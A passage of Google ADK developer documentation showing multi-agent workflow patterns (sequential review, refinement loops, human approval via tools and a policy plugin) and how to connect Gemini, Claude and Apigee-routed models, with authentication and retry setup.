`SequentialAgent` ensures generation happens before review. - **Communication:** **Shared Session State** (Generator uses `output_key` to save output; Reviewer reads that state key). The Reviewer might save its feedback to another state key for subsequent steps. ```python # Conceptual Code: Generator-Critic from google.adk.agents import SequentialAgent, LlmAgent generator = LlmAgent( name="DraftWriter", instruction="Write a short paragraph about subject X.", output_key="draft_text" ) reviewer = LlmAgent( name="FactChecker", instruction="Review the text in {draft_text} for factual accuracy. Output 'valid' or 'invalid' with reasons.", output_key="review_status" ) # Optional: Further steps based on review_status review_pipeline = SequentialAgent( name="WriteAndReview", sub_agents=[generator, reviewer] ) # generator runs -> saves draft to state['draft_text'] # reviewer runs -> reads state['draft_text'], saves status to state['review_status'] ``` ```typescript // Conceptual Code: Generator-Critic import { SequentialAgent, LlmAgent } from '@google/adk'; const generator = new LlmAgent({ name: 'DraftWriter', instruction: 'Write a short paragraph about subject X.', outputKey: 'draft_text' }); const reviewer = new LlmAgent({ name: 'FactChecker', instruction: 'Review the text in {draft_text} for factual accuracy. Output "valid" or "invalid" with reasons.', outputKey: 'review_status' }); // Optional: Further steps based on review_status const reviewPipeline = new SequentialAgent({ name: 'WriteAndReview', subAgents: [generator, reviewer] }); // generator runs -> saves draft to state['draft_text'] // reviewer runs -> reads state['draft_text'], saves status to state['review_status'] ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" ) // Conceptual Code: Generator-Critic generator, _ := llmagent.New(llmagent.Config{ Name: "DraftWriter", Instruction: "Write a short paragraph about subject X.", OutputKey: "draft_text", Model: m, }) reviewer, _ := llmagent.New(llmagent.Config{ Name: "FactChecker", Instruction: "Review the text in {draft_text} for factual accuracy. Output 'valid' or 'invalid' with reasons.", OutputKey: "review_status", Model: m, }) reviewPipeline, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "WriteAndReview", SubAgents: []agent.Agent{generator, reviewer}}, }) // generator runs -> saves draft to state["draft_text"] // reviewer runs -> reads state["draft_text"], saves status to state["review_status"] ``` ```java // Conceptual Code: Generator-Critic import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; LlmAgent generator = LlmAgent.builder() .name("DraftWriter") .instruction("Write a short paragraph about subject X.") .outputKey("draft_text") .build(); LlmAgent reviewer = LlmAgent.builder() .name("FactChecker") .instruction("Review the text in {draft_text} for factual accuracy. Output 'valid' or 'invalid' with reasons.") .outputKey("review_status") .build(); // Optional: Further steps based on review_status SequentialAgent reviewPipeline = SequentialAgent.builder() .name("WriteAndReview") .subAgents(generator, reviewer) .build(); // generator runs -> saves draft to state['draft_text'] // reviewer runs -> reads state['draft_text'], saves status to state['review_status'] ``` ### Iterative Refinement Pattern - **Structure:** Uses a [`LoopAgent`](https://google.github.io/adk-docs/agents/workflow-agents/loop-agents/index.md) containing one or more agents that work on a task over multiple iterations. - **Goal:** Progressively improve a result (e.g., code, text, plan) stored in the session state until a quality threshold is met or a maximum number of iterations is reached. - **ADK Primitives Used:** - **Workflow:** `LoopAgent` manages the repetition. - **Communication:** **Shared Session State** is essential for agents to read the previous iteration's output and save the refined version. - **Termination:** The loop typically ends based on `max_iterations` or a dedicated checking agent setting `escalate=True` in the `Event Actions` when the result is satisfactory. ```python # Conceptual Code: Iterative Code Refinement from google.adk.agents import LoopAgent, LlmAgent, BaseAgent from google.adk.events import Event, EventActions from google.adk.agents.invocation_context import InvocationContext from typing import AsyncGenerator # Agent to generate/refine code based on state['current_code'] and state['requirements'] code_refiner = LlmAgent( name="CodeRefiner", instruction="Read state['current_code'] (if exists) and state['requirements']. Generate/refine Python code to meet requirements. Save to state['current_code'].", output_key="current_code" # Overwrites previous code in state ) # Agent to check if the code meets quality standards quality_checker = LlmAgent( name="QualityChecker", instruction="Evaluate the code in state['current_code'] against state['requirements']. Output 'pass' or 'fail'.", output_key="quality_status" ) # Custom agent to check the status and escalate if 'pass' class CheckStatusAndEscalate(BaseAgent): async def _run_async_impl(self, ctx: InvocationContext) -> AsyncGenerator[Event, None]: status = ctx.session.state.get("quality_status", "fail") should_stop = (status == "pass") yield Event(author=self.name, actions=EventActions(escalate=should_stop)) refinement_loop = LoopAgent( name="CodeRefinementLoop", max_iterations=5, sub_agents=[code_refiner, quality_checker, CheckStatusAndEscalate(name="StopChecker")] ) # Loop runs: Refiner -> Checker -> StopChecker # State['current_code'] is updated each iteration. # Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 iterations. ``` ```typescript // Conceptual Code: Iterative Code Refinement import { LoopAgent, LlmAgent, BaseAgent, InvocationContext } from '@google/adk'; import type { Event, createEvent, createEventActions } from '@google/genai'; // Agent to generate/refine code based on state['current_code'] and state['requirements'] const codeRefiner = new LlmAgent({ name: 'CodeRefiner', instruction: 'Read state["current_code"] (if exists) and state["requirements"]. Generate/refine Typescript code to meet requirements. Save to state["current_code"].', outputKey: 'current_code' // Overwrites previous code in state }); // Agent to check if the code meets quality standards const qualityChecker = new LlmAgent({ name: 'QualityChecker', instruction: 'Evaluate the code in state["current_code"] against state["requirements"]. Output "pass" or "fail".', outputKey: 'quality_status' }); // Custom agent to check the status and escalate if 'pass' class CheckStatusAndEscalate extends BaseAgent { async *runAsyncImpl(ctx: InvocationContext): AsyncGenerator { const status = ctx.session.state.quality_status; const shouldStop = status === 'pass'; if (shouldStop) { yield createEvent({ author: 'StopChecker', actions: createEventActions(), }); } } async *runLiveImpl(ctx: InvocationContext): AsyncGenerator { // This agent doesn't have a live implementation yield createEvent({ author: 'StopChecker' }); } } // Loop runs: Refiner -> Checker -> StopChecker // State['current_code'] is updated each iteration. // Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 iterations. const refinementLoop = new LoopAgent({ name: 'CodeRefinementLoop', maxIterations: 5, subAgents: [codeRefiner, qualityChecker, new CheckStatusAndEscalate({name: 'StopChecker'})] }); ``` ```go import ( "iter" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/loopagent" "google.golang.org/adk/session" ) // Conceptual Code: Iterative Code Refinement codeRefiner, _ := llmagent.New(llmagent.Config{ Name: "CodeRefiner", Instruction: "Read state['current_code'] (if exists) and state['requirements']. Generate/refine Python code to meet requirements. Save to state['current_code'].", OutputKey: "current_code", Model: m, }) qualityChecker, _ := llmagent.New(llmagent.Config{ Name: "QualityChecker", Instruction: "Evaluate the code in state['current_code'] against state['requirements']. Output 'pass' or 'fail'.", OutputKey: "quality_status", Model: m, }) checkStatusAndEscalate, _ := agent.New(agent.Config{ Name: "StopChecker", Run: func(ctx agent.InvocationContext) iter.Seq2[*session.Event, error] { return func(yield func(*session.Event, error) bool) { status, _ := ctx.Session().State().Get("quality_status") shouldStop := status == "pass" yield(&session.Event{Author: "StopChecker", Actions: session.EventActions{Escalate: shouldStop}}, nil) } }, }) refinementLoop, _ := loopagent.New(loopagent.Config{ MaxIterations: 5, AgentConfig: agent.Config{Name: "CodeRefinementLoop", SubAgents: []agent.Agent{codeRefiner, qualityChecker, checkStatusAndEscalate}}, }) // Loop runs: Refiner -> Checker -> StopChecker // State["current_code"] is updated each iteration. // Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 iterations. ``` ```java // Conceptual Code: Iterative Code Refinement import com.google.adk.agents.BaseAgent; import com.google.adk.agents.LlmAgent; import com.google.adk.agents.LoopAgent; import com.google.adk.events.Event; import com.google.adk.events.EventActions; import com.google.adk.agents.InvocationContext; import io.reactivex.rxjava3.core.Flowable; import java.util.List; // Agent to generate/refine code based on state['current_code'] and state['requirements'] LlmAgent codeRefiner = LlmAgent.builder() .name("CodeRefiner") .instruction("Read state['current_code'] (if exists) and state['requirements']. Generate/refine Java code to meet requirements. Save to state['current_code'].") .outputKey("current_code") // Overwrites previous code in state .build(); // Agent to check if the code meets quality standards LlmAgent qualityChecker = LlmAgent.builder() .name("QualityChecker") .instruction("Evaluate the code in state['current_code'] against state['requirements']. Output 'pass' or 'fail'.") .outputKey("quality_status") .build(); BaseAgent checkStatusAndEscalate = new BaseAgent( "StopChecker","Checks quality_status and escalates if 'pass'.", List.of(), null, null) { @Override protected Flowable runAsyncImpl(InvocationContext invocationContext) { String status = (String) invocationContext.session().state().getOrDefault("quality_status", "fail"); boolean shouldStop = "pass".equals(status); EventActions actions = EventActions.builder().escalate(shouldStop).build(); Event event = Event.builder() .author(this.name()) .actions(actions) .build(); return Flowable.just(event); } }; LoopAgent refinementLoop = LoopAgent.builder() .name("CodeRefinementLoop") .maxIterations(5) .subAgents(codeRefiner, qualityChecker, checkStatusAndEscalate) .build(); // Loop runs: Refiner -> Checker -> StopChecker // State['current_code'] is updated each iteration. // Loop stops if QualityChecker outputs 'pass' (leading to StopChecker escalating) or after 5 // iterations. ``` ### Human-in-the-Loop Pattern - **Structure:** Integrates human intervention points within an agent workflow. - **Goal:** Allow for human oversight, approval, correction, or tasks that AI cannot perform. - **ADK Primitives Used (Conceptual):** - **Interaction:** Can be implemented using a custom **Tool** that pauses execution and sends a request to an external system (e.g., a UI, ticketing system) waiting for human input. The tool then returns the human's response to the agent. - **Workflow:** Could use **LLM-Driven Delegation** (`transfer_to_agent`) targeting a conceptual "Human Agent" that triggers the external workflow, or use the custom tool within an `LlmAgent`. - **State/Callbacks:** State can hold task details for the human; callbacks can manage the interaction flow. - **Note:** ADK doesn't have a built-in "Human Agent" type, so this requires custom integration. ```python # Conceptual Code: Using a Tool for Human Approval from google.adk.agents import LlmAgent, SequentialAgent from google.adk.tools import FunctionTool # --- Assume external_approval_tool exists --- # This tool would: # 1. Take details (e.g., request_id, amount, reason). # 2. Send these details to a human review system (e.g., via API). # 3. Poll or wait for the human response (approved/rejected). # 4. Return the human's decision. # async def external_approval_tool(amount: float, reason: str) -> str: ... approval_tool = FunctionTool(func=external_approval_tool) # Agent that prepares the request prepare_request = LlmAgent( name="PrepareApproval", instruction="Prepare the approval request details based on user input. Store amount and reason in state.", # ... likely sets state['approval_amount'] and state['approval_reason'] ... ) # Agent that calls the human approval tool request_approval = LlmAgent( name="RequestHumanApproval", instruction="Use the external_approval_tool with amount from state['approval_amount'] and reason from state['approval_reason'].", tools=[approval_tool], output_key="human_decision" ) # Agent that proceeds based on human decision process_decision = LlmAgent( name="ProcessDecision", instruction="Check {human_decision}. If 'approved', proceed. If 'rejected', inform user." ) approval_workflow = SequentialAgent( name="HumanApprovalWorkflow", sub_agents=[prepare_request, request_approval, process_decision] ) ``` ```typescript // Conceptual Code: Using a Tool for Human Approval import { LlmAgent, SequentialAgent, FunctionTool } from '@google/adk'; import { z } from 'zod'; // --- Assume externalApprovalTool exists --- // This tool would: // 1. Take details (e.g., request_id, amount, reason). // 2. Send these details to a human review system (e.g., via API). // 3. Poll or wait for the human response (approved/rejected). // 4. Return the human's decision. async function externalApprovalTool(params: {amount: number, reason: string}): Promise<{decision: string}> { // ... implementation to call external system return {decision: 'approved'}; // or 'rejected' } const approvalTool = new FunctionTool({ name: 'external_approval_tool', description: 'Sends a request for human approval.', parameters: z.object({ amount: z.number(), reason: z.string(), }), execute: externalApprovalTool, }); // Agent that prepares the request const prepareRequest = new LlmAgent({ name: 'PrepareApproval', instruction: 'Prepare the approval request details based on user input. Store amount and reason in state.', // ... likely sets state['approval_amount'] and state['approval_reason'] ... }); // Agent that calls the human approval tool const requestApproval = new LlmAgent({ name: 'RequestHumanApproval', instruction: 'Use the external_approval_tool with amount from state["approval_amount"] and reason from state["approval_reason"].', tools: [approvalTool], outputKey: 'human_decision' }); // Agent that proceeds based on human decision const processDecision = new LlmAgent({ name: 'ProcessDecision', instruction: 'Check {human_decision}. If "approved", proceed. If "rejected", inform user.' }); const approvalWorkflow = new SequentialAgent({ name: 'HumanApprovalWorkflow', subAgents: [prepareRequest, requestApproval, processDecision] }); ``` ```go import ( "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/agent/workflowagents/sequentialagent" "google.golang.org/adk/tool" ) // Conceptual Code: Using a Tool for Human Approval // --- Assume externalApprovalTool exists --- // func externalApprovalTool(amount float64, reason string) (string, error) { ... } type externalApprovalToolArgs struct { Amount float64 `json:"amount" jsonschema:"The amount for which approval is requested."` Reason string `json:"reason" jsonschema:"The reason for the approval request."` } var externalApprovalTool func(tool.Context, externalApprovalToolArgs) (string, error) approvalTool, _ := functiontool.New( functiontool.Config{ Name: "external_approval_tool", Description: "Sends a request for human approval.", }, externalApprovalTool, ) prepareRequest, _ := llmagent.New(llmagent.Config{ Name: "PrepareApproval", Instruction: "Prepare the approval request details based on user input. Store amount and reason in state.", Model: m, }) requestApproval, _ := llmagent.New(llmagent.Config{ Name: "RequestHumanApproval", Instruction: "Use the external_approval_tool with amount from state['approval_amount'] and reason from state['approval_reason'].", Tools: []tool.Tool{approvalTool}, OutputKey: "human_decision", Model: m, }) processDecision, _ := llmagent.New(llmagent.Config{ Name: "ProcessDecision", Instruction: "Check {human_decision}. If 'approved', proceed. If 'rejected', inform user.", Model: m, }) approvalWorkflow, _ := sequentialagent.New(sequentialagent.Config{ AgentConfig: agent.Config{Name: "HumanApprovalWorkflow", SubAgents: []agent.Agent{prepareRequest, requestApproval, processDecision}}, }) ``` ```java // Conceptual Code: Using a Tool for Human Approval import com.google.adk.agents.LlmAgent; import com.google.adk.agents.SequentialAgent; import com.google.adk.tools.FunctionTool; // --- Assume external_approval_tool exists --- // This tool would: // 1. Take details (e.g., request_id, amount, reason). // 2. Send these details to a human review system (e.g., via API). // 3. Poll or wait for the human response (approved/rejected). // 4. Return the human's decision. // public boolean externalApprovalTool(float amount, String reason) { ... } FunctionTool approvalTool = FunctionTool.create(externalApprovalTool); // Agent that prepares the request LlmAgent prepareRequest = LlmAgent.builder() .name("PrepareApproval") .instruction("Prepare the approval request details based on user input. Store amount and reason in state.") // ... likely sets state['approval_amount'] and state['approval_reason'] ... .build(); // Agent that calls the human approval tool LlmAgent requestApproval = LlmAgent.builder() .name("RequestHumanApproval") .instruction("Use the external_approval_tool with amount from state['approval_amount'] and reason from state['approval_reason'].") .tools(approvalTool) .outputKey("human_decision") .build(); // Agent that proceeds based on human decision LlmAgent processDecision = LlmAgent.builder() .name("ProcessDecision") .instruction("Check {human_decision}. If 'approved', proceed. If 'rejected', inform user.") .build(); SequentialAgent approvalWorkflow = SequentialAgent.builder() .name("HumanApprovalWorkflow") .subAgents(prepareRequest, requestApproval, processDecision) .build(); ``` #### Human in the Loop with Policy A more advanced and structured way to implement Human-in-the-Loop is by using a `PolicyEngine`. This approach allows you to define policies that can trigger a confirmation step from a user before a tool is executed. The `SecurityPlugin` intercepts a tool call, consults the `PolicyEngine`, and if the policy dictates, it will automatically request user confirmation. This pattern is more robust for enforcing governance and security rules. Here's how it works: 1. **`SecurityPlugin`**: You add this plugin to your `Runner`. It acts as an interceptor for all tool calls. 1. **`BasePolicyEngine`**: You create a custom class that implements this interface. Its `evaluate()` method contains your logic to decide if a tool call needs confirmation. 1. **`PolicyOutcome.CONFIRM`**: When your `evaluate()` method returns this outcome, the `SecurityPlugin` pauses the tool execution and generates a special `FunctionCall` using `getAskUserConfirmationFunctionCalls`. 1. **Application Handling**: Your application code receives this special function call and presents the confirmation request to the user. 1. **User Confirmation**: Once the user confirms, your application sends a `FunctionResponse` back to the agent, which allows the `SecurityPlugin` to proceed with the original tool execution. TypeScript Recommended Pattern The Policy-based pattern is the recommended approach for implementing Human-in-the-Loop workflows in TypeScript. Support in other ADK languages is planned for future releases. A conceptual example of using a `CustomPolicyEngine` to require user confirmation before executing any tool is shown below. ```typescript const rootAgent = new LlmAgent({ name: 'weather_time_agent', model: 'gemini-2.5-flash', description: 'Agent to answer questions about the time and weather in a city.', instruction: 'You are a helpful agent who can answer user questions about the time and weather in a city.', tools: [getWeatherTool], }); class CustomPolicyEngine implements BasePolicyEngine { async evaluate(_context: ToolCallPolicyContext): Promise { // Default permissive implementation return Promise.resolve({ outcome: PolicyOutcome.CONFIRM, reason: 'Needs confirmation for tool call', }); } } const runner = new InMemoryRunner({ agent: rootAgent, appName, plugins: [new SecurityPlugin({policyEngine: new CustomPolicyEngine()})] }); ``` You can find the full code sample [here](https://github.com/google/adk-docs/blob/main/examples/typescript/snippets/agents/workflow-agents/hitl_confirmation_agent.ts). ### Combining Patterns These patterns provide starting points for structuring your multi-agent systems. You can mix and match them as needed to create the most effective architecture for your specific application. # AI Models for ADK agents Supported in ADKPythonTypescriptGoJava Agent Development Kit (ADK) is designed for flexibility, allowing you to integrate various Large Language Models (LLMs) into your agents. This section details how to leverage Gemini and integrate other popular models effectively, including those hosted externally or running locally. ADK primarily uses two mechanisms for model integration: 1. **Direct String / Registry:** For models tightly integrated with Google Cloud, such as Gemini models accessed via Google AI Studio or Vertex AI, or models hosted on Vertex AI endpoints. You access these models by providing the model name or endpoint resource string and ADK's internal registry resolves this string to the appropriate backend client. - [Gemini models](/adk-docs/agents/models/google-gemini/) - [Claude models](/adk-docs/agents/models/anthropic/) - [Vertex AI hosted models](/adk-docs/agents/models/vertex/) 1. **Model connectors:** For broader compatibility, especially models outside the Google ecosystem or those requiring specific client configurations, such as models accessed via Apigee or LiteLLM. You instantiate a specific wrapper class, such as `ApigeeLlm` or `LiteLlm`, and pass this object as the `model` parameter to your `LlmAgent`. - [Apigee models](/adk-docs/agents/models/apigee/) - [LiteLLM models](/adk-docs/agents/models/litellm/) - [Ollama model hosting](/adk-docs/agents/models/ollama/) - [vLLM model hosting](/adk-docs/agents/models/vllm/) # Claude models for ADK agents Supported in ADKJava v0.2.0 You can integrate Anthropic's Claude models directly using an Anthropic API key or from a Vertex AI backend into your Java ADK applications by using the ADK's `Claude` wrapper class. You can also access Anthropic models through Google Cloud Vertex AI services. For more information, see the [Third-Party Models on Vertex AI](/adk-docs/agents/models/vertex/#third-party-models-on-vertex-ai-eg-anthropic-claude) section. You can also use Anthropic models through the [LiteLLM](/adk-docs/agents/models/litellm/) library for Python. ## Get started The following code examples show a basic implementation for using Gemini models in your agents: ```java public static LlmAgent createAgent() { AnthropicClient anthropicClient = AnthropicOkHttpClient.builder() .apiKey("ANTHROPIC_API_KEY") .build(); Claude claudeModel = new Claude( "claude-3-7-sonnet-latest", anthropicClient ); return LlmAgent.builder() .name("claude_direct_agent") .model(claudeModel) .instruction("You are a helpful AI assistant powered by Anthropic Claude.") .build(); } ``` ## Prerequisites 1. **Dependencies:** - **Anthropic SDK Classes (Transitive):** The Java ADK's `com.google.adk.models.Claude` wrapper relies on classes from Anthropic's official Java SDK. These are typically included as *transitive dependencies*. For more information, see the [Anthropic Java SDK](https://github.com/anthropics/anthropic-sdk-java). 1. **Anthropic API Key:** - Obtain an API key from Anthropic. Securely manage this key using a secret manager. ## Example implementation Instantiate `com.google.adk.models.Claude`, providing the desired Claude model name and an `AnthropicOkHttpClient` configured with your API key. Then, pass the `Claude` instance to your `LlmAgent`, as shown in the following example: ```java import com.anthropic.client.AnthropicClient; import com.google.adk.agents.LlmAgent; import com.google.adk.models.Claude; import com.anthropic.client.okhttp.AnthropicOkHttpClient; // From Anthropic's SDK public class DirectAnthropicAgent { private static final String CLAUDE_MODEL_ID = "claude-3-7-sonnet-latest"; // Or your preferred Claude model public static LlmAgent createAgent() { // It's recommended to load sensitive keys from a secure config AnthropicClient anthropicClient = AnthropicOkHttpClient.builder() .apiKey("ANTHROPIC_API_KEY") .build(); Claude claudeModel = new Claude( CLAUDE_MODEL_ID, anthropicClient ); return LlmAgent.builder() .name("claude_direct_agent") .model(claudeModel) .instruction("You are a helpful AI assistant powered by Anthropic Claude.") // ... other LlmAgent configurations .build(); } public static void main(String[] args) { try { LlmAgent agent = createAgent(); System.out.println("Successfully created direct Anthropic agent: " + agent.name()); } catch (IllegalStateException e) { System.err.println("Error creating agent: " + e.getMessage()); } } } ``` # Apigee AI Gateway for ADK agents Supported in ADKPython v1.18.0Java v0.4.0 [Apigee](https://docs.cloud.google.com/apigee/docs/api-platform/get-started/what-apigee) provides a powerful [AI Gateway](https://cloud.google.com/solutions/apigee-ai), transforming how you manage and govern your generative AI model traffic. By exposing your AI model endpoint (like Vertex AI or the Gemini API) through an Apigee proxy, you immediately gain enterprise-grade capabilities: - **Model Safety:** Implement security policies like Model Armor for threat protection. - **Traffic Governance:** Enforce Rate Limiting and Token Limiting to manage costs and prevent abuse. - **Performance:** Improve response times and efficiency using Semantic Caching and advanced model routing. - **Monitoring & Visibility:** Get granular monitoring, analysis, and auditing of all your AI requests. Note The `ApigeeLLM` wrapper is currently designed for use with Vertex AI and the Gemini API (generateContent). We are continually expanding support for other models and interfaces. ## Example implementation Integrate Apigee's governance into your agent's workflow by instantiating the `ApigeeLlm` wrapper object and pass it to an `LlmAgent` or other agent type. ```python from google.adk.agents import LlmAgent from google.adk.models.apigee_llm import ApigeeLlm # Instantiate the ApigeeLlm wrapper model = ApigeeLlm( # Specify the Apigee route to your model. For more info, check out the ApigeeLlm documentation (https://github.com/google/adk-python/tree/main/contributing/samples/hello_world_apigeellm). model="apigee/gemini-2.5-flash", # The proxy URL of your deployed Apigee proxy including the base path proxy_url=f"https://{APIGEE_PROXY_URL}", # Pass necessary authentication/authorization headers (like an API key) custom_headers={"foo": "bar"} ) # Pass the configured model wrapper to your LlmAgent agent = LlmAgent( model=model, name="my_governed_agent", instruction="You are a helpful assistant powered by Gemini and governed by Apigee.", # ... other agent parameters ) ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.models.ApigeeLlm; import com.google.common.collect.ImmutableMap; ApigeeLlm apigeeLlm = ApigeeLlm.builder() .modelName("apigee/gemini-2.5-flash") // Specify the Apigee route to your model. For more info, check out the ApigeeLlm documentation .proxyUrl(APIGEE_PROXY_URL) //The proxy URL of your deployed Apigee proxy including the base path .customHeaders(ImmutableMap.of("foo", "bar")) //Pass necessary authentication/authorization headers (like an API key) .build(); LlmAgent agent = LlmAgent.builder() .model(apigeeLlm) .name("my_governed_agent") .description("my_governed_agent") .instruction("You are a helpful assistant powered by Gemini and governed by Apigee.") // tools will be added next .build(); ``` With this configuration, every API call from your agent will be routed through Apigee first, where all necessary policies (security, rate limiting, logging) are executed before the request is securely forwarded to the underlying AI model endpoint. For a full code example using the Apigee proxy, see [Hello World Apigee LLM](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world_apigeellm). # Google Gemini models for ADK agents Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.2.0 ADK supports the Google Gemini family of generative AI models that provide a powerful set of models with a wide range of features. ADK provides support for many Gemini features, including [Code Execution](/adk-docs/tools/gemini-api/code-execution/), [Google Search](/adk-docs/tools/gemini-api/google-search/), [Context caching](/adk-docs/context/caching/), [Computer use](/adk-docs/tools/gemini-api/computer-use/) and the [Interactions API](#interactions-api). ## Get started The following code examples show a basic implementation for using Gemini models in your agents: ```python from google.adk.agents import LlmAgent # --- Example using a stable Gemini Flash model --- agent_gemini_flash = LlmAgent( # Use the latest stable Flash model identifier model="gemini-2.5-flash", name="gemini_flash_agent", instruction="You are a fast and helpful Gemini assistant.", # ... other agent parameters ) ``` ```typescript import {LlmAgent} from '@google/adk'; // --- Example #2: using a powerful Gemini Pro model with API Key in model --- export const rootAgent = new LlmAgent({ name: 'hello_time_agent', model: 'gemini-2.5-flash', description: 'Gemini flash agent', instruction: `You are a fast and helpful Gemini assistant.`, }); ``` ```go import ( "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model/gemini" "google.golang.org/genai" ) // --- Example using a stable Gemini Flash model --- modelFlash, err := gemini.NewModel(ctx, "gemini-2.0-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("failed to create model: %v", err) } agentGeminiFlash, err := llmagent.New(llmagent.Config{ // Use the latest stable Flash model identifier Model: modelFlash, Name: "gemini_flash_agent", Instruction: "You are a fast and helpful Gemini assistant.", // ... other agent parameters }) if err != nil { log.Fatalf("failed to create agent: %v", err) } ``` ```java // --- Example #1: using a stable Gemini Flash model with ENV variables--- LlmAgent agentGeminiFlash = LlmAgent.builder() // Use the latest stable Flash model identifier .model("gemini-2.5-flash") // Set ENV variables to use this model .name("gemini_flash_agent") .instruction("You are a fast and helpful Gemini assistant.") // ... other agent parameters .build(); ``` ## Gemini model authentication This section covers authenticating with Google's Gemini models, either through Google AI Studio for rapid development or Google Cloud Vertex AI for enterprise applications. This is the most direct way to use Google's flagship models within ADK. **Integration Method:** Once you are authenticated using one of the below methods, you can pass the model's identifier string directly to the `model` parameter of `LlmAgent`. Tip The `google-genai` library, used internally by ADK for Gemini models, can connect through either Google AI Studio or Vertex AI. **Model support for voice/video streaming** In order to use voice/video streaming in ADK, you will need to use Gemini models that support the Live API. You can find the **model ID(s)** that support the Gemini Live API in the documentation: - [Google AI Studio: Gemini Live API](https://ai.google.dev/gemini-api/docs/models#live-api) - [Vertex AI: Gemini Live API](https://cloud.google.com/vertex-ai/generative-ai/docs/live-api) ### Google AI Studio This is the simplest method and is recommended for getting started quickly. - **Authentication Method:** API Key - **Setup:** 1. **Get an API key:** Obtain your key from [Google AI Studio](https://aistudio.google.com/apikey). 1. **Set environment variables:** Create a `.env` file (Python) or `.properties` (Java) in your project's root directory and add the following lines. ADK will automatically load this file. ```shell export GOOGLE_API_KEY="YOUR_GOOGLE_API_KEY" export GOOGLE_GENAI_USE_VERTEXAI=FALSE ``` (or) Pass these variables during the model initialization via the `Client` (see example below). - **Models:** Find all available models on the [Google AI for Developers site](https://ai.google.dev/gemini-api/docs/models). ### Google Cloud Vertex AI For scalable and production-oriented use cases, Vertex AI is the recommended platform. Gemini on Vertex AI supports enterprise-grade features, security, and compliance controls. Based on your development environment and usecase, *choose one of the below methods to authenticate*. **Pre-requisites:** A Google Cloud Project with [Vertex AI enabled](https://console.cloud.google.com/apis/enableflow;apiid=aiplatform.googleapis.com). ### **Method A: User Credentials (for Local Development)** 1. **Install the gcloud CLI:** Follow the official [installation instructions](https://cloud.google.com/sdk/docs/install). 1. **Log in using ADC:** This command opens a browser to authenticate your user account for local development. ```bash gcloud auth application-default login ``` 1. **Set environment variables:** ```shell export GOOGLE_CLOUD_PROJECT="YOUR_PROJECT_ID" export GOOGLE_CLOUD_LOCATION="YOUR_VERTEX_AI_LOCATION" # e.g., us-central1 ``` Explicitly tell the library to use Vertex AI: ```shell export GOOGLE_GENAI_USE_VERTEXAI=TRUE ``` 1. **Models:** Find available model IDs in the [Vertex AI documentation](https://cloud.google.com/vertex-ai/generative-ai/docs/learn/models). ### **Method B: Vertex AI Express Mode** [Vertex AI Express Mode](https://cloud.google.com/vertex-ai/generative-ai/docs/start/express-mode/overview) offers a simplified, API-key-based setup for rapid prototyping. 1. **Sign up for Express Mode** to get your API key. 1. **Set environment variables:** ```shell export GOOGLE_API_KEY="PASTE_YOUR_EXPRESS_MODE_API_KEY_HERE" export GOOGLE_GENAI_USE_VERTEXAI=TRUE ``` ### **Method C: Service Account (for Production & Automation)** For deployed applications, a service account is the standard method. 1. [**Create a Service Account**](https://cloud.google.com/iam/docs/service-accounts-create#console) and grant it the `Vertex AI User` role. 1. **Provide credentials to your application:** - **On Google Cloud:** If you are running the agent in Cloud Run, GKE, VM or other Google Cloud services, the environment can automatically provide the service account credentials. You don't have to create a key file. - **Elsewhere:** Create a [service account key file](https://cloud.google.com/iam/docs/keys-create-delete#console) and point to it with an environment variable: ```bash export GOOGLE_APPLICATION_CREDENTIALS="/path/to/your/keyfile.json" ``` Instead of the key file, you can also authenticate the service account using Workload Identity. But this is outside the scope of this guide. Secure Your Credentials Service account credentials or API keys are powerful credentials. Never expose them publicly. Use a secret manager such as [Google Cloud Secret Manager](https://cloud.google.com/security/products/secret-manager) to store and access them securely in production. Gemini model versions Always check the official Gemini documentation for the latest model names, including specific preview versions if needed. Preview models might have different availability or quota limitations. ## Troubleshooting ### Error Code 429 - RESOURCE_EXHAUSTED This error usually happens if the number of your requests exceeds the capacity allocated to process requests. To mitigate this, you can do one of the following: 1. Request higher quota limits for the model you are trying to use. 1. Enable client-side retries. Retries allow the client to automatically retry the request after a delay, which can help if the quota issue is temporary. There are two ways you can set retry options: **Option 1:** Set retry options on the Agent as a part of generate_content_config. You would use this option if you are instantiating this model adapter by yourself. ```python root_agent = Agent( model='gemini-2.5-flash', ... generate_content_config=types.GenerateContentConfig( ... http_options=types.HttpOptions( ... retry_options=types.HttpRetryOptions(initial_delay=1, attempts=2), ... ), ... ) ``` **Option 2:** Retry options on this model adapter. You would use this option if you were instantiating the instance of adapter by yourself. ```python from google.genai import types # ... agent = Agent( model=Gemini( retry_options=types.HttpRetryOptions(initial_delay=1, attempts=2), ) ) ``` ## Gemini Interactions API Supported in ADKPython v1.21.0 The Gemini [Interactions API](https://ai.google.dev/gemini-api/docs/interactions) is an alternative to the ***generateContent*** inference API, which provides stateful conversation capabilities, allowing you to chain interactions using a `previous_interaction_id` instead of sending the full conversation history with each request. Using this feature can be more efficient for long conversations. You can enable the Interactions API by setting the `use_interactions_api=True` parameter in the Gemini model configuration, as shown in the following code snippet: ```python from google.adk.agents.llm_agent import Agent from google.adk.models.google_llm import Gemini from google.adk.tools.google_search_tool import GoogleSearchTool root_agent = Agent( model=Gemini( model="gemini-2.5-flash", use_interactions_api=True, # Enable Interactions API ), name="interactions_test_agent", tools=[ GoogleSearchTool(bypass_multi_tools_limit=True), # Converted to function tool get_current_weather, # Custom function tool ], ) ``` For a complete code sample, see the [Interactions API sample](https://github.com/google/adk-python/tree/main/contributing/samples/interactions_api). ### Known limitations The Interactions API **does not** support mixing custom function calling tools with built-in tools, such as the [Google Search](/adk-docs/tools/built-in-tools/#google-search), tool, within the same agent. You can work around this limitation by configuring the the built-in tool to operate as a custom tool using the `bypass_multi_tools_limit` parameter: ```python # Use 